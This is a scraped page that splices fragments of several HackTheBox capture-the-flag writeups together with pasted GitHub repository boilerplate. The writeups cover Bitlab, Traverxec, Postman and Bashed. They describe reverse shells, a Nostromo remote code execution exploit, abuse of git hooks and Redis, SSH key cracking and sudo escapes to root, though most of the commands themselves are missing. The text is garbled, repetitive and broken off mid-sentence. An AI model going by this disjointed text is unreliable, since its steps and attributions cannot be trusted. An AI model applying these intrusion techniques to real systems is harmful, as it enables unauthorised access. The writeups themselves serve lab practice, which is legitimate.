Bitlab is a medium difficulty machine running Linux. Be sure to checkout the Basic Setup section before you get started.
Like always, enumeration is our first port of call. If we click the Explore link at the bottom of the page it brings us to another page that tells us that there are No projects found :. Going through the links at the top menu Groups and Snippets also have nothing to show.
However, when we click on the Help link we are presented with a directory that contains a bookmarks. This file is related to exporting bookmarks from browsers so this could potentially show us some juicy data.
Logging in to Gitlab we are presented with two projects Profile and Deployer :. There is also a link to a profile box bootstrap snippet which is contained in the index. When an event occurs the index.
Looks like we have found the entry point for our foothold and potentially even a leap straight to root since sudo is being used.
All we need to do is update the Profile repository, commit the changes, submit a merge request and then merge the changes. This should satisfy all conditions of the webhook event that clave has setup and our changes to the repository should be pulled into the profile directory on the system. To gain a shell we will simply edit index. We then go through clicking the buttons Commit changesSubmit merge request and then Merge.
We can upgrade our shell if we wish. First things first we should take a look at this postgres mention we found in the Profile repository readme file. We can see a bunch of stuff in the Activity section that we have already seen. Moving along we go to the Snippets link and find a submission called Postgresql. Hopefully we can find some juicy info.
Category Archives: HackTheBox
Looks like more credentials. At first I thought that the password was base64 encoding as it decodes to the string ssh-str0ng-p ss.
However, the password is just disguised as one potentially for a rabbithole affect. We can simply login with the password as is:. We take yet another user. Time for root. If you are missing the Executable modules and References windows you can open them by going to View in the top menu:. We should see a list appear in the References window showing a bunch of strings:. This looked like it could potentially be a password but on checking this was not the case.GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.
If nothing happens, download GitHub Desktop and try again. If nothing happens, download Xcode and try again. If nothing happens, download the GitHub extension for Visual Studio and try again. Machines writeups until March are protected with the corresponding root flag. But since this date, HTB flags are dynamic and different for every user, so is not possible for us to maintain this kind of system.
So from now we will accept only password protected challenges and retired machines that machine write-ups don't need password. It is totally forbidden to unprotect remove the password and distribute the pdf files of active machines, if we detect any misuse will be reported immediately to the HTB admins. Anyway, all the authors of the writeups of active machines in this repository are not responsible for the misuse that can be given to the corresponding documents. Please think that this is done to share techniques not for spoilers.
In this way, you will be added to our top contributors list see below and you will also receive an invitation link to an exclusive Telegram group where several hints not spoilers are discussed for the HacktheBox machines. Please consider protecting the text of your writeup e.
Of course, if someone leaks a writeup of an active machine it is not the responsibility of the author. If we detect someone who does it, they will immediately report to the HTB Staff so they can take the appropriate measures. Note: the minimum requirement to enter the "special" Telegram group is also to have a hacker level or higher no script kiddies.
Hack the Box is a superb platform to learn pentesting, there are many challenges and machines of different levels and with each one you manage to pass you learn a new thing.
But talking among ourselves we realized that many times there are several ways to get rooting a machine, get a flag That's why we created this repository, as a site to share different unofficial writeups to see different techniques and acquire even more knowledge.
That is our goal and our passion, to share to learn together. Some people have been distrustful because in this repository there are writeups of active machines, even knowing that absolutely each one of them is protected with the corresponding password root flag or challenge.A version scan with nmap did however reveal a interesting fact:.
And sure enough there was a vulnerability in it CVE which allowed remote code execution.
HackTheBox ForwardSlash Writeup – 10.10.10.183
And for that a metasploit module exists. So we simply use this to get our foothold shell as www-data :. Doing enumeration we can see that only one other user exists on the system. We need to escalate to that first. When taking a look at the Nostromo configuration we find an interesting option enabled:.
At the very end the homedirs are enabled. We can simply look which files are stored there with our existing shell:. We copy that locally to our attacking machine. The private key is encrypted, so we brute-force the password. First converting the key into a format that john understands and then brute-force it:. Next we need to escalate to root. This script uses sudo to run journalctl.
We can simply call that sudo journalctl and break out of the then opened pager:. Once the pager is running simply typing! The website on port 80 showed nothing of interest for us. On port there was a Webmin instance running in version 1.HackTheBox - Bitlab
That leaves the open Redis port There is a common way to escalate to a shell using Redis. There are two important things here to mention. First, the public key that we prepared to pipe into redis-cli is surrounded by a couple of newlines.
If they are missing the SSH server will not be able to find our public key in the file since Redis will write some binary data to the beginning of the line. This can be looked up by installing the Redis service on a local machine and figuring out what is set as the default home for this user. This is still a rather constructed scenario since the. Now we have a low privileged shell on the system. Searching for files owned by this user on the system we find this:. The first hit looks interesting.
A SSH private key backup file, which is readable by us. But it is encrypted. We copy it locally to our attacking Kali and brute-force the password:. We now have the password, but connecting via SSH using this key still fails.
Bashed – HackTheBox writeup
But we now have valid credentials.As with all HackTheBox machines I started with an nmap scan which identified port 80 was open and running nostromo 1. While searching for some information on nostromo, pretty much the first search result was about a known vulnerability. I quickly found an exploit for it here. The exploit is basically a directory traversal vulnerability with remote command execution, hence the box name Traverxec. Using the above exploit script I poked around the box and found an.
Hoping those were the credentials to login via SSH I tried doing that, but no. Apparently they were for something else so I went back to poking in the box. At this point it started to get a little cumbersome to use the above exploit script for every command, so I used it to make a reverse Netcat shell to my machine:.
For the next part I had to look closely at the nhttpd file where I found the. Something was amiss though, as I had execute rights on that folder, so I could cd into it but not run ls on it. After looking at the usual files. This worked, and I was able to use ls here and find a backup file. This backup file contained a private SSH keyfile which I transferred to my host machine and cracked with john.
Finally I had a pair of credentials to SSH into the machine and grab the user. Looking up the command journalctl on GTFObin revealed how one could escape the current environment and get a shell with! With this I could read root. As is usual with HackTheBox, I started with an nmap scan and discovered ports 22 and 80 open.
Now the problem was where to find this file and execute it, and I wasted a long time on this step. I found a code snippet on the server with a postgresql connection command including database username and password. Expanding upon this code snippet I wrote some php code to extract information from the database:. Running this code the same way as for the initial shell, I succeeded in extracting a username and password from the database itself:.
Trying the password without decoding however did work, so I guess that was a way for the box maker to troll us. After logging in as clave, I immediately noticed a Windows binary in the home folder. I downloaded this to my machine with scp:. After spending way too much time trying to run and reverse engineer the binary using a Windows 7 virtual machine I gave up and used wine with Kali instead. Two usernames can also be found in the above config file, and a third can be found on the forum page Hazard.
Using lookupsid.Then I check the folders found by gobuster and notice couple interesting files phpbash. This allows you to execute commands as user www-data. So I make a copy of the reverse shell, update the ip address and port and then setup a webserver to serve the file. With this sudo ability, I can receive a bash shell as user scriptmanager. But using that to search around the system does not find any additional useful information. This brings up a few possible exploits. Until I try the exploit Since the target system is bit, I use -m64 flag to compile the file.
Then I upload it to the system and try it:. However, when I looked at the test.
So I thought there must be another member working on the system and poking around the script. I should be more careful and pay more attention to out of place stuffs.
Thank you author Arrexel for the box Bashed. Alan Chan October 20, Target: Does not find anything of interests. Click on phpbash. Pretty straight forward. Privilege Escalation sudo -l reveals that I can perform sudo command as user scriptmanager With this sudo ability, I can receive a bash shell as user scriptmanager.
Then I upload it to the system and try it: This one worked great. Received root shell. Shocker — HackTheBox writeup October 17, Leave a Reply Cancel reply. Close Menu.As is usual with HackTheBox, I started with an nmap scan and discovered ports 22 and 80 open.
Since the server was running php I tried uploading a simple php reverse shell:. Now the problem was where to find this file and execute it, and I wasted a long time on this step. I found a code snippet on the server with a postgresql connection command including database username and password.
Expanding upon this code snippet I wrote some php code to extract information from the database:. Running this code the same way as for the initial shell, I succeeded in extracting a username and password from the database itself:.
Trying the password without decoding however did work, so I guess that was a way for the box maker to troll us. After logging in as clave, I immediately noticed a Windows binary in the home folder. I downloaded this to my machine with scp:. After spending way too much time trying to run and reverse engineer the binary using a Windows 7 virtual machine I gave up and used wine with Kali instead.
Bitlab is rated as a medium box on HackTheBox. Using ssh to log into the box as clave, I was able to get user. Root After logging in as clave, I immediately noticed a Windows binary in the home folder. I downloaded this to my machine with scp: scp clave Using this password I could ssh into the box as root and get root.
Leave a Reply Cancel reply Your email address will not be published. Comment Name Email Website.The home page is redirected to the sign in page.
The bottom has 2 links of interest. Explore and Help. Explore link bring us to the Projects page where we can see current projects, groups and snippets. All links except Gitlab Login point to external sites.
To find out what the variable contains, we can use the development console. The easiest way to use this credentials is to bookmark the link right click on the link :. The credentials is populated to the sign in form. How convenient. Of course, we can also simply type in the credentials ourselves. Now click on Sign In and we sign successful in to the application.
This Gitlab allows us to maintain our projects. Essentially, we can upload any files to the project. This will use ip-address Sure enough, we are able to perform git pull. So do some researches on Google and I am able to find out a feature call git hook. Couple good read can be found at:. For git pullhook post-merge scripts can be used and will be triggered when a merge occurs. To achieve that, we will create a local copy of the project Profile.
Then make some changes and perform a merge. And finally doing a sudo git pull on the local copy will trigger the custom post-merge script defined in the local copy. Privilege Escalation Vulnerability: sudo git pull Explanation: hook script for post-merge can be defined to perform code execution as root Enumeration nmap -p- -A -T4 Help page only has a bookmarks. The easiest way to use this credentials is to bookmark the link right click on the link : Now go back to the login page and select the bookmarked link: The credentials is populated to the sign in form.
Now click on Sign In and we sign successful in to the application This Gitlab allows us to maintain our projects. Now make it available to the website. Couple good read can be found at: Git Hooks githooks documentation For git pullhook post-merge scripts can be used and will be triggered when a merge occurs. Modify shell Leave a Reply Cancel reply.